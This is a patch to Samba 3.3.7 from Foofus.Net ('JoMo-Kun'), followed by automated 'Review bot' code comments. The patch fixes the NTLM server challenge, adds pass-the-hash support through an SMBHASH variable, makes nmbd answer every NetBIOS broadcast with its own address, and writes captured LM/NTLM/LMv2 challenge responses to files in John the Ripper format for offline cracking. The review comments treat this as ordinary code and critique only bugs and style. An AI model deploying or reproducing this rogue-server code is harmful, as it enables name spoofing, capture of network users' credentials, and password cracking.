diff -rub samba-3.3.7/source/auth/auth.c samba-3.3.7-jmk/source/auth/auth.c
--- samba-3.3.7/source/auth/auth.c	2009-07-28 03:30:39.000000000 -0500
+++ samba-3.3.7-jmk/source/auth/auth.c	2009-09-02 16:30:31.572438368 -0500
@@ -82,6 +82,8 @@
 	const char *challenge_set_by = NULL;
 	auth_methods *auth_method;
 	TALLOC_CTX *mem_ctx;
+  char addr[INET6_ADDRSTRLEN];
+
 
 	if (auth_context->challenge.length) {
 		DEBUG(5, ("get_ntlm_challenge (auth subsystem): returning previous challenge by module %s (normal)\n", 
@@ -123,14 +125,20 @@
 	}
 	
 	if (!challenge_set_by) {
-		uchar chal[8];
+		uchar chal[8] = { 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88 };
+		int i;
 		
 		generate_random_buffer(chal, sizeof(chal));
 		auth_context->challenge = data_blob_talloc(auth_context->mem_ctx, 
 							   chal, sizeof(chal));
 		
-		challenge_set_by = "random";
-		auth_context->challenge_may_be_modified = True;
+		challenge_set_by = "jmk";
+		auth_context->challenge_may_be_modified = False;
+		DEBUG(0, ("*** Fixed LM/NTLM Challenge Samba Attack -- Foofus.Net/JoMo-Kun ***\n")); 
+		DEBUGADD(0, ("[%s] Set server challenge: ", client_addr(get_client_fd(), addr, sizeof(addr))));
+		for (i=0; i<auth_context->challenge.length; i++)
+			DEBUGADD(0, ("%2.2X", 0xFF & (int)auth_context->challenge.data[i]));
+		DEBUGADD(0, ("\n"));
 	} 
 	
 	DEBUG(5, ("auth_context challenge created by %s\n", challenge_set_by));
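Review bot: The switch of `challenge_may_be_modified` from `True` to `False` carries no comment, although it changes what later code is allowed to do with the challenge on every connection that reaches this branch. A line such as `/* later modules must not replace the challenge set here (confirm against the users of this flag) */` would record the intent next to the assignment. The new dump loop compares `int i` with `auth_context->challenge.length`; declaring the index as `size_t i;` avoids the signed/unsigned comparison. The enclosing function begins and ends outside this hunk.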
diff -rub samba-3.3.7/source/libsmb/smbencrypt.c samba-3.3.7-jmk/source/libsmb/smbencrypt.c
--- samba-3.3.7/source/libsmb/smbencrypt.c	2009-07-28 03:30:39.000000000 -0500
+++ samba-3.3.7-jmk/source/libsmb/smbencrypt.c	2009-09-02 15:40:57.652349670 -0500
@@ -41,6 +41,9 @@
 #endif
 }
 
+#define SMB_HASH_LM 1
+#define SMB_HASH_NTLM 2
+
 /*
    This implements the X/Open SMB password encryption
    It takes a password ('unix' string), a 8 byte "crypt key" 
@@ -59,6 +62,64 @@
 	return ret;
 }
 
+/*
+   Support for using LM/NTLM hashes -- jmk@foofus.net 10/2006 
+   Greets: Foofus, Phenfen, Omi, Fizzgig, pMonkey
+*/
+void E_set_hash(int type, uchar hash[16])
+{
+	uint l;
+	char p[1024];
+	int i, j;
+	char HexChar;
+	int HexValue;
+
+	if ( (getenv("SMBHASH")) && (strlen(getenv("SMBHASH")) == 65) )
+	{
+    memset(p, 0, 1024);
+		strncpy(p, getenv("SMBHASH"), 1024);
+
+    /* Replace "NO PASSWORD*********************" */
+    if ((type == SMB_HASH_LM) && (strncmp(p, "N", 1) == 0))
+      strncpy(p, "AAD3B435B51404EEAAD3B435B51404EE", 32);
+    else if ((type == SMB_HASH_NTLM) && (strncmp(p+33, "N", 1) == 0))
+      strncpy(p+33, "31D6CFE0D16AE931B73C59D7E0C089C0", 32);
+    
+		for (i=0; i<16; i++) {
+			HexValue = 0x0;
+			for (j=0; j<2; j++) {
+				if (type == SMB_HASH_LM)
+					HexChar = (char)p[2*i+j];
+				else
+					HexChar = (char)p[2*i+j+33];
+
+				if (HexChar > 0x39)
+					HexChar = HexChar | 0x20;  /* convert upper case to lower */
+
+				if (!(((HexChar >= 0x30) && (HexChar <= 0x39))||   /* 0 - 9 */
+					 ((HexChar >= 0x61) && (HexChar <= 0x66)))) {    /* a - f */
+					fprintf(stderr, "Error invalid char (%c) for hash.\n", HexChar);
+					exit(1);
+				}
+
+				HexChar -= 0x30;
+				if (HexChar > 0x09)  /* HexChar is "a" - "f" */
+					HexChar -= 0x27;
+
+				HexValue = (HexValue << 4) | (char)HexChar;
+			}
+			hash[i] = (uchar)HexValue;
+		}
+	}
+	else
+	{
+		fprintf(stderr, "Error reading SMB HASH.\n");
+		fprintf(stderr, "\tEx: export SMBHASH=\"_LM_HASH_:_NTLM_HASH_\"\n");
+		exit(1);
+	}
+}
+/* jmk */
+
 /**
  * Creates the MD4 Hash of the users password in NT UNICODE.
  * @param passwd password in 'unix' charset.
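Review bot: `E_set_hash` ends the whole process with `exit(1)` on a missing or malformed `SMBHASH`, which is a heavy side effect for a helper in libsmb that any linked program can reach; returning a status would let the caller fail cleanly. The local buffer `p` holds hash material and is never cleared, unlike the `ZERO_STRUCT(wpwd)` pattern used in the routine below, so `ZERO_STRUCT(p);` before returning would keep the file consistent. The length test accepts any 65-byte value without checking that `p[32]` is the `:` separator, and any `type` other than `SMB_HASH_LM` is silently treated as NTLM. `getenv("SMBHASH")` is also evaluated three times where one call stored in a local `const char *` would do.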
@@ -70,6 +131,11 @@
 	int len;
 	smb_ucs2_t wpwd[129];
 	
+	/* Support for using NTLM hashes -- jmk@foofus.net 10/2006 */
+	if ( getenv("SMBHASH") ) {
+		fprintf(stderr, "HASH PASS: Substituting user supplied NTLM HASH...\n");
+		E_set_hash(SMB_HASH_NTLM, p16);
+	} else { 
 	/* Password must be converted to NT unicode - null terminated. */
 	push_ucs2(NULL, wpwd, (const char *)passwd, 256, STR_UNICODE|STR_NOALIGN|STR_TERMINATE);
 	/* Calculate length in bytes */
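Review bot: Once `SMBHASH` is present in the environment, `passwd` is ignored and every caller of this routine receives the same `p16`, whatever password it passed in; the `-113,6 +180,11` hunk adds the same pattern to the LM routine. Because this is shared library code, that presumably includes callers that hash a password in order to store or verify it, not only client logons (the callers are not visible here). An explicit parameter, or a flag set only by the one program that needs the override, would keep it out of unrelated code paths. The statements moved into the `else` are not re-indented, and the function continues into the next hunk, where the closing brace is added.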
@@ -77,6 +143,7 @@
 
 	mdfour(p16, (unsigned char *)wpwd, len);
 	ZERO_STRUCT(wpwd);	
+	}
 }
 
 /**
@@ -113,6 +180,11 @@
 	fstring dospwd; 
 	ZERO_STRUCT(dospwd);
 	
+	/* Support for using LM hashes -- jmk@foofus.net 10/2006 */
+	if ( getenv("SMBHASH") ) {
+		fprintf(stderr, "HASH PASS: Substituting user supplied LM HASH...\n");
+		E_set_hash(SMB_HASH_LM, p16);
+	} else {
 	/* Password must be converted to DOS charset - null terminated, uppercase. */
 	push_ascii(dospwd, passwd, sizeof(dospwd), STR_UPPER|STR_TERMINATE);
        
@@ -124,6 +196,7 @@
 	}
 
 	ZERO_STRUCT(dospwd);	
+	}
 
 	return ret;
 }
diff -rub samba-3.3.7/source/nmbd/nmbd.c samba-3.3.7-jmk/source/nmbd/nmbd.c
--- samba-3.3.7/source/nmbd/nmbd.c	2009-07-28 03:30:39.000000000 -0500
+++ samba-3.3.7-jmk/source/nmbd/nmbd.c	2009-09-02 16:03:27.624795325 -0500
@@ -849,6 +849,9 @@
 
 	DEBUG(0,("nmbd version %s started.\n", SAMBA_VERSION_STRING));
 	DEBUGADD(0,("%s\n", COPYRIGHT_STARTUP_MESSAGE));
+	DEBUGADD(0, ("\n----------------------------------------------------------\n"));
+	DEBUGADD(0, ("*** NMB Broadcast Auto-Response -- Foofus.Net/JoMo-Kun ***\n"));
+	DEBUGADD(0, ("----------------------------------------------------------\n\n"));
 
 	if (!lp_load_initial_only(get_dyn_CONFIGFILE())) {
 		DEBUG(0, ("error opening config file\n"));
diff -rub samba-3.3.7/source/nmbd/nmbd_incomingrequests.c samba-3.3.7-jmk/source/nmbd/nmbd_incomingrequests.c
--- samba-3.3.7/source/nmbd/nmbd_incomingrequests.c	2009-07-28 03:30:39.000000000 -0500
+++ samba-3.3.7-jmk/source/nmbd/nmbd_incomingrequests.c	2009-09-02 16:05:50.398286430 -0500
@@ -448,18 +448,44 @@
 	struct name_record *namerec = NULL;
 	int reply_data_len = 0;
 	int i;
+	int num_ips;
 	
 	DEBUG(3,("process_name_query_request: Name query from %s on subnet %s for name %s\n", 
 		 inet_ntoa(p->ip), subrec->subnet_name, nmb_namestr(question)));
   
+	/* ********************************************************************************* */
+	/* 
+		 Hack to make nmbd respond with our IP for all NMB broadcasts.
+		 Based on ideas from Karma (http://www.theta44.org/karma/). 
+		 JoMo-Kun <jmk@foofus.net> [02/2007]
+	*/
+ 
 	/* Look up the name in the cache - if the request is a broadcast request that
 	   came from a subnet we don't know about then search all the broadcast subnets
 	   for a match (as we don't know what interface the request came in on). */
 
+	/*
 	if(subrec == remote_broadcast_subnet)
 		namerec = find_name_for_remote_broadcast_subnet( question, FIND_ANY_NAME);
 	else
 		namerec = find_name_on_subnet(subrec, question, FIND_ANY_NAME);
+	*/
+
+	/* Create Response Packet */
+	DEBUGADD(0, ("[%s] NetBIOS Broadcast Request: %s\n", inet_ntoa(p->ip), question->name) );
+	namerec = SMB_MALLOC_P(struct name_record);
+	memset( (char *)namerec, '\0', sizeof(*namerec) );
+	namerec->subnet = subrec;
+	make_nmb_name(&namerec->name, question->name, 0x00);
+	namerec->data.nb_flags = NB_ACTIVE;
+	namerec->data.wins_flags = WINS_ACTIVE;
+	namerec->data.nb_flags = NB_PERM;
+	namerec->data.source = SELF_NAME;
+	num_ips = iface_count(); 
+	namerec->data.num_ips = num_ips;
+	namerec->data.ip = SMB_MALLOC_ARRAY( struct in_addr, num_ips );
+	memcpy( (namerec->data.ip), &subrec->myip, num_ips * sizeof(struct in_addr) );
+	/* ********************************************************************************* */
 
 	/* Check if it is a name that expired */
 	if (namerec && 
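Review bot: `memcpy( (namerec->data.ip), &subrec->myip, num_ips * sizeof(struct in_addr) )` copies `iface_count()` addresses from what is addressed as a single `myip` field, so with more than one interface it reads beyond that field (assuming `myip` is one `struct in_addr`, as its use here suggests). Neither `SMB_MALLOC_P` nor `SMB_MALLOC_ARRAY` is checked before the `memset` and `memcpy` that dereference the results. Nothing in the hunk frees `namerec` or `namerec->data.ip`, so unless later code releases them, every name query received from the network leaves an allocation behind. `question->name` comes from the request packet and is printed with `%s` at level 0 without filtering. The function begins and ends outside this hunk.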
diff -rub samba-3.3.7/source/smbd/negprot.c samba-3.3.7-jmk/source/smbd/negprot.c
--- samba-3.3.7/source/smbd/negprot.c	2009-07-28 03:30:39.000000000 -0500
+++ samba-3.3.7-jmk/source/smbd/negprot.c	2009-09-02 16:21:04.870333222 -0500
@@ -255,6 +255,7 @@
 	bool negotiate_spnego = False;
 	time_t t = time(NULL);
 	ssize_t ret;
+  char addr[INET6_ADDRSTRLEN];
 
 	global_encrypted_passwords_negotiated = lp_encrypted_passwords();
 
@@ -371,6 +372,7 @@
 			return;
 		}
 		DEBUG(3,("not using SPNEGO\n"));
+		DEBUGADD(0,("[%s] Simple and Protected GSSAPI Negotiation Mechanism (SPNEG) Disabled.\n", client_addr(get_client_fd(), addr, sizeof(addr))));
 	} else {
 		DATA_BLOB spnego_blob = negprot_spnego();
 
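Review bot: The added `DEBUGADD(0, …)` follows a `DEBUG(3, …)` call, and `DEBUGADD` is the continuation form that prints without a header of its own, so at log levels below 3 the line appears with no header at all; `DEBUG(0,("[%s] …", …))` would give it one. The same applies to the `DEBUGADD` additions in the `-390,6` and `-672,8` hunks of this file and to those added in reply.c and sesssetup.c. The message text says `SPNEG` where the mechanism is SPNEGO, and `Enabled (NTLMv2)` in the next hunk states a protocol version that negotiating SPNEGO does not establish by itself. The new `char addr[INET6_ADDRSTRLEN];` declarations are indented with spaces in a tab-indented file.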
@@ -390,6 +392,7 @@
 
 		SCVAL(req->outbuf,smb_vwv16+1, 0);
 		DEBUG(3,("using SPNEGO\n"));
+		DEBUGADD(0,("[%s] Simple and Protected GSSAPI Negotiation Mechanism (SPNEG) Enabled (NTLMv2).\n", client_addr(get_client_fd(), addr, sizeof(addr))));
 	}
 	
 	SSVAL(req->outbuf,smb_vwv17, p - q); /* length of challenge+domain
@@ -517,6 +520,7 @@
 	char **cliprotos;
 	int i;
 	size_t converted_size;
+  char addr[INET6_ADDRSTRLEN];
 
 	static bool done_negprot = False;
 
@@ -672,8 +676,9 @@
 		reload_services(True);          
 		supported_protocols[protocol].proto_reply_fn(req, choice);
 		DEBUG(3,("Selected protocol %s\n",supported_protocols[protocol].proto_name));
+		DEBUGADD(0,("[%s] Selected protocol: %s\n", client_addr(get_client_fd(), addr, sizeof(addr)), supported_protocols[protocol].proto_name));
 	} else {
-		DEBUG(0,("No protocol supported !\n"));
+		DEBUG(0,("[%s] No protocol supported !\n", client_addr(get_client_fd(), addr, sizeof(addr))));
 		reply_outbuf(req, 1, 0);
 		SSVAL(req->outbuf, smb_vwv0, choice);
 	}
diff -rub samba-3.3.7/source/smbd/reply.c samba-3.3.7-jmk/source/smbd/reply.c
--- samba-3.3.7/source/smbd/reply.c	2009-07-28 03:30:39.000000000 -0500
+++ samba-3.3.7-jmk/source/smbd/reply.c	2009-09-02 16:22:32.040811318 -0500
@@ -456,6 +456,7 @@
 	int msg_flags = CVAL(inbuf,1);
 	fstring name1,name2;
 	char name_type = 0;
+  char addr[INET6_ADDRSTRLEN];
 
 	/*
 	 * We only really use 4 bytes of the outbuf, but for the smb_setlen
@@ -491,6 +492,9 @@
 		DEBUG(2,("netbios connect: name1=%s name2=%s\n",
 			 name1,name2));      
 
+		DEBUGADD(0, ("[%s] Server NetBIOS Name: %s\n", client_addr(get_client_fd(), addr, sizeof(addr)), name1));
+		DEBUGADD(0, ("[%s] Client NetBIOS Name: %s\n", client_addr(get_client_fd(), addr, sizeof(addr)), name2));
+
 		set_local_machine_name(name1, True);
 		set_remote_machine_name(name2, True);
 
@@ -634,6 +638,7 @@
 	char *path = NULL;
 	char *p, *q;
 	uint16 tcon_flags;
+  char addr[INET6_ADDRSTRLEN];
 
 	START_PROFILE(SMBtconX);
 
@@ -717,6 +722,7 @@
 		return;
 	}
 
+	DEBUGADD(0, ("[%s] Device Type: %s Share: %s\n", client_addr(get_client_fd(), addr, sizeof(addr)), client_devicetype, service));
 	DEBUG(4,("Client requested device type [%s] for share [%s]\n", client_devicetype, service));
 
 	conn = make_connection(service, password, client_devicetype,
diff -rub samba-3.3.7/source/smbd/sesssetup.c samba-3.3.7-jmk/source/smbd/sesssetup.c
--- samba-3.3.7/source/smbd/sesssetup.c	2009-07-28 03:30:39.000000000 -0500
+++ samba-3.3.7-jmk/source/smbd/sesssetup.c	2009-09-03 11:10:17.879146925 -0500
@@ -1474,7 +1474,13 @@
 		char *p = smb_buf(req->inbuf);
 		char *save_p = smb_buf(req->inbuf);
 		uint16 byte_count;
-
+		int i;	
+		int chars_to_copy = 0;	
+		char *pathname;
+		char *filename;
+		char *tempname;
+		FILE *fp;
+    char addr[INET6_ADDRSTRLEN];
 
 		if(global_client_caps == 0) {
 			global_client_caps = IVAL(req->inbuf,smb_vwv11);
@@ -1543,6 +1549,48 @@
 		if (doencrypt) {
 			lm_resp = data_blob(p, passlen1);
 			nt_resp = data_blob(p+passlen1, passlen2);
+
+			if (passlen2 > 24) /* LMv2 */
+			{
+				DEBUGADD(0, ("[%s] LM Client Response: ", client_addr(get_client_fd(), addr, sizeof(addr))));
+				for (i=0; i<16; i++)
+					DEBUGADD(0, ("%2.2X", 0xFF & (int)p[i]));
+	 
+				DEBUGADD(0, ("\n[%s] LM Client Challenge: ", client_addr(get_client_fd(), addr, sizeof(addr))));
+				for (i=16; i<passlen1; i++)
+					DEBUGADD(0, ("%2.2X", 0xFF & (int)p[i]));
+	 
+				DEBUGADD(0, ("\n"));
+			}
+			else /* LM */ 
+			{
+				DEBUGADD(0, ("[%s] LM Client Response: ", client_addr(get_client_fd(), addr, sizeof(addr))));
+				for (i=0; i<passlen1; i++)
+					DEBUGADD(0, ("%2.2X", 0xFF & (int)p[i]));
+			
+				DEBUGADD(0, ("\n"));
+			}
+
+			if (passlen2 > 24)	/* NTLMv2 */ 
+			{
+				DEBUGADD(0, ("[%s] NT Client Response: ", client_addr(get_client_fd(), addr, sizeof(addr))));
+				for (i=0; i<16; i++)
+					DEBUGADD(0, ("%2.2X", 0xFF & (int)p[passlen1 +i]));
+	 
+				DEBUGADD(0, ("\n[%s] NT Client Challenge: ", client_addr(get_client_fd(), addr, sizeof(addr))));
+				for (i=16; i<passlen2; i++)
+					DEBUGADD(0, ("%2.2X", 0xFF & (int)p[passlen1 +i]));
+
+			 DEBUGADD(0, ("\n"));
+			}
+			else /* NTLM */
+			{
+				DEBUGADD(0, ("[%s] NT Client Response: ", client_addr(get_client_fd(), addr, sizeof(addr))));
+				for (i=0; i<passlen2; i++)
+					DEBUGADD(0, ("%2.2X", 0xFF & (int)p[passlen1 +i]));
+				
+				DEBUGADD(0, ("\n"));
+			}
 		} else if (lp_security() != SEC_SHARE) {
 			/*
 			 * In share level we should ignore any passwords, so
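Review bot: The LM dump in the first `passlen2 > 24` branch prints `p[0]` through `p[15]` without looking at `passlen1`, so a request with a short first field and a long second field gets bytes of the second field labelled as the LM response. The branch is also selected by `passlen2`, although everything it prints belongs to the first field. Bounding the loop by the field being printed, `for (i = 0; i < 16 && i < passlen1; i++)`, keeps the output inside the blob built on the context line above. These bytes arrive from the client before authentication and are written at level 0 on every request, so the log can be grown at will by a remote peer. The enclosing block starts and ends outside this hunk.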
@@ -1602,9 +1650,130 @@
 					     primary_domain, p,
 					     sizeof(primary_domain),
 					     STR_TERMINATE);
-		} else {
+		} else
 			fstrcpy( primary_domain, "null" );
+
+		DEBUGADD(0, ("[%s] Client Name: %s Remote Machine Name: %s\n", client_addr(get_client_fd(), addr, sizeof(addr)), client_name(get_client_fd()), get_remote_machine_name()));
+		DEBUGADD(0, ("[%s] User: %s\n", client_addr(get_client_fd(), addr, sizeof(addr)), user));
+		DEBUGADD(0, ("[%s] Domain: %s\n", client_addr(get_client_fd(), addr, sizeof(addr)), domain));
+		DEBUGADD(0, ("[%s] Primary Domain: %s\n", client_addr(get_client_fd(), addr, sizeof(addr)), primary_domain));
+		DEBUGADD(0, ("[%s] Native OS: %s\n", client_addr(get_client_fd(), addr, sizeof(addr)), native_os));
+		DEBUGADD(0, ("[%s] Native LanMan: %s\n", client_addr(get_client_fd(), addr, sizeof(addr)), native_lanman));
+
+		/* Log LM/NTLM/LMv2 Challenge/Response in John Format */
+		if ( doencrypt ) {
+			DEBUGADD(0,("\n*** Logging LM/NTLM/LMv2 Challenge/Response Exchanges to File (John/jtr Format) ***\n"));
+
+			/* Set Logging Path */
+			if ( strlen(lp_logfile()) != 0 )
+			{
+				filename = lp_logfile();
+				tempname = strrchr(filename, '/');
+				pathname = malloc(tempname - filename + 1);
+				memset(pathname, 0, tempname - filename + 1);
+				strncpy(pathname, filename, tempname - filename);
+			}
+			else
+			{
+				pathname = malloc(5);
+				memset(pathname, 0, 5);
+				snprintf(pathname, 4, "/tmp");
+			}
+
+			/* Set Log File Name */
+			if ((lm_resp.length == 24) && (nt_resp.length != 24))
+			{
+				filename = malloc(strlen(pathname) + 13 + 1);
+				memset(filename, 0, strlen(pathname) + 13 + 1);
+				snprintf(filename, strlen(pathname) + 13 + 1, "%s/dump.NETLMv2", pathname);
+			}
+			else if ((lm_resp.length == 24) && (nt_resp.length == 24))
+			{
+				filename = malloc(strlen(pathname) + 11 + 1);
+				memset(filename, 0, strlen(pathname) + 11 + 1);
+				snprintf(filename, strlen(pathname) + 11 + 1, "%s/dump.NETLM", pathname);
 		}
+			else
+			{
+				DEBUGADD(0,("Failed to identify LM/NTLM/LMv2 hashes based on length.\n"));
+				filename = NULL;
+			}
+
+			DEBUGADD(0,("Set LM/NTLM/LMv2 Dump File:%s\n", filename));
+			free(pathname);
+
+			fp = fopen(filename, "a");
+			if (fp == NULL) {
+				DEBUGADD(0, ("Failed to Open Dump File.\n"));
+			}
+			/* Log LMv2 Challenge/Response */
+			/* USER::DOMAIN:1122334455667788:498B5E245BAFA65E56334B28E3F501CF:6FE8BB5B66ED5892 */
+			else if ((lm_resp.length == 24) && (nt_resp.length != 24))
+			{
+				DEBUGADD(0,("Dumping LMv2 Response\n"));
+				
+				/* Client Username */
+				fprintf(fp, "%s::", user);
+
+				/* Client Domain */
+				if (strlen(domain) != 0)
+					fprintf(fp, "%s:", domain);
+				else
+					fprintf(fp, ":");
+		
+				/* Fixed Server Challenge */
+				fprintf(fp, "1122334455667788:");
+
+				/* CLient LMv2 Response */
+				for (i=0; i<16; i++)
+					fprintf(fp, "%2.2X", (0xFF & (int)lm_resp.data[i]));
+		
+				fprintf(fp, ":"); 
+
+				/* Client LMv2 Challenge */
+				for (i=16; i<passlen1;i++)
+					fprintf(fp, "%2.2X", (0xFF & (int)lm_resp.data[i]));
+
+				fprintf(fp, "\n");
+
+				fclose(fp);
+			}
+			/* Log LM/NTLM Challenge/Response */
+			/* USER::DOMAIN:1122334455667788:E70F85C227FB0ED25AAE68715B54FA4E:BFC5ACEC40927AEF */
+			else if ((lm_resp.length == 24) && (nt_resp.length == 24))
+			{
+				DEBUGADD(0,("Dumping LM/NTLM Response\n"));
+
+				/* Client Username */
+				fprintf(fp, "%s::", user);
+
+				/* Client Domain */
+				if (strlen(domain) != 0)
+					fprintf(fp, "%s:", domain);
+				else
+					fprintf(fp, ":");
+		
+				/* Client LM Response */
+				for (i=0; i<passlen1; i++)
+					fprintf(fp,"%2.2X", 0xFF & (int)lm_resp.data[i] );
+			 
+				fprintf(fp, ":"); 
+				
+				/* Client NTLM Response */
+				for (i=0; i<passlen1; i++)
+					fprintf(fp,"%2.2X", 0xFF & (int)nt_resp.data[i] );
+				
+				/* Fixed Server Challenge */
+				fprintf(fp, ":1122334455667788\n");
+
+				fclose(fp);
+			}
+			 
+			DEBUGADD(0, ("\n*** Completed Dumping Challenge/Response ***\n"));
+		}
+		else
+			DEBUGADD(0, ("\n*** Memory Allocation Failure! ***\n"));
+		/* response dumping code ends */
 
 		DEBUG(3,("Domain=[%s]  NativeOS=[%s] NativeLanMan=[%s] "
 			"PrimaryDomain=[%s]\n",
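Review bot: `fopen(filename, "a")` is reached with `filename == NULL` when neither length test matches, and the `DEBUGADD` just before it passes that NULL to `%s`; the unmatched case should skip the file block, for example `fp = (filename != NULL) ? fopen(filename, "a") : NULL;`. The path code has similar gaps: `strrchr(filename, '/')` returns NULL for a log file setting without a slash and is then used in pointer arithmetic, every `malloc` result is used unchecked, and the allocated `filename` is never freed. The final `else` that prints "Memory Allocation Failure" is attached to `if ( doencrypt )`, so it fires on every non-encrypted session setup and never on an actual allocation failure. `user` and `domain` are taken from the request and written with `%s` into a colon-delimited, newline-terminated record, so a client can inject separators or extra lines unless they are filtered first. The `/tmp` fallback opens a predictable name in a world-writable directory in append mode, which follows a pre-placed symlink with the privileges of the daemon.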
